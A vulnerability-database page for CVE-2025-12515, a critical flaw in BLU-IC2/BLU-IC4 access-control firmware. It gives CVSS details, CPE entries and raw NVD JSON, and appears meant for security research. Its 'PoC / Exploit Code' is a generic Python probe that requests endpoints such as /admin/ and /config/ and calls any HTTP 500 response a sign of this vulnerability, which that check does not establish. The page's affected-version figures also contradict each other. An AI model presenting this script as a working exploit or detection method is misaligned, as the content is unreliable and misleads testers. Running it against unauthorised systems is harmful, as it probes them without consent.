Security Vulnerability Report
中文
CVE-2025-12515 CVSS 9.8 CRITICAL

CVE-2025-12515

Published: 2025-10-30 16:15:35
Last Modified: 2025-11-10 14:53:32
Source: a0340c66-c385-4f8b-991b-3d05f6fd5220

Description

Systemic Internal Server Errors - HTTP 500 ResponseThis issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5 .

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:azure-access:blu-ic2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:azure-access:blu-ic2:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:azure-access:blu-ic4_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:azure-access:blu-ic4:*:*:*:*:*:*:*:* - NOT VULNERABLE
BLU-IC2 < 1.19.5
BLU-IC4 < 1.19.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-12515 PoC - BLU-IC2/BLU-IC4 Internal Server Error Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys import argparse from urllib.parse import urljoin def test_vulnerability(target_url, endpoint="/"): """ Test for CVE-2025-12515 - Internal Server Error vulnerability in BLU-IC2 and BLU-IC4 devices """ full_url = urljoin(target_url, endpoint) print(f"[*] Testing target: {full_url}") print(f"[*] CVE-2025-12515 - BLU-IC2/BLU-IC4 Internal Server Error\n") # Common HTTP methods to test methods = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH'] for method in methods: try: print(f"[*] Testing {method} request...") if method == 'GET': response = requests.get(full_url, timeout=10) elif method == 'POST': response = requests.post(full_url, timeout=10) elif method == 'PUT': response = requests.put(full_url, timeout=10) elif method == 'DELETE': response = requests.delete(full_url, timeout=10) elif method == 'PATCH': response = requests.patch(full_url, timeout=10) print(f" Status Code: {response.status_code}") # Check for HTTP 500 Internal Server Error if response.status_code == 500: print(f"[!] VULNERABLE: Internal Server Error detected!") print(f" Response Body: {response.text[:200]}...") return True elif response.status_code >= 400: print(f" Error Response: {response.status_code}") else: print(f" Response OK: {response.status_code}") except requests.exceptions.RequestException as e: print(f" [!] Request failed: {e}") print("\n[*] Testing common endpoints...") common_endpoints = [ '/api/', '/api/v1/', '/admin/', '/config/', '/status/', '/api/status', '/health', '/api/health', '/login', '/api/login', '/users', '/api/users', '/settings' ] for endpoint in common_endpoints: try: full_url = urljoin(target_url, endpoint) response = requests.get(full_url, timeout=5) if response.status_code == 500: print(f"[!] VULNERABLE endpoint found: {endpoint}") print(f" Status: 500 Internal Server Error") return True except: pass print("\n[*] PoC execution completed.") print("[*] Note: HTTP 500 responses indicate potential vulnerability.") print("[*] Verify with vendor documentation and authorized testing.") return False if __name__ == "__main__": parser = argparse.ArgumentParser( description='CVE-2025-12515 PoC - BLU-IC2/BLU-IC4 Internal Server Error' ) parser.add_argument('target', help='Target URL (e.g., http://target.com)') parser.add_argument('-e', '--endpoint', default='/', help='Endpoint to test') args = parser.parse_args() vulnerable = test_vulnerability(args.target, args.endpoint) if vulnerable: print("\n[!] Target appears to be vulnerable to CVE-2025-12515") sys.exit(1) else: print("\n[*] No obvious vulnerability detected") sys.exit(0)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12515", "sourceIdentifier": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "published": "2025-10-30T16:15:34.960", "lastModified": "2025-11-10T14:53:32.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Systemic Internal Server Errors - HTTP 500 ResponseThis issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5 ."}], "metrics": {"cvssMetricV40": [{"source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-394"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:azure-access:blu-ic2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20", "matchCriteriaId": "00BF15A1-C965-4601-83E9-8617B86E833A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:azure-access:blu-ic2:*:*:*:*:*:*:*:*", "matchCriteriaId": "C898C110-6C42-40A0-93FC-B6ED785F23A9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:azure-access:blu-ic4_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20", "matchCriteriaId": "6493C6E4-1304-4B28-A6C5-37CE2D1EAE46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:azure-access:blu-ic4:*:*:*:*:*:*:*:*", "matchCriteriaId": "902CD787-42BF-4565-8CA5-78123E37AA99"}]}]}], "references": [{"url": "https://azure-access.com/security-advisories", "source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "tags": ["Vendor Advisory"]}]}}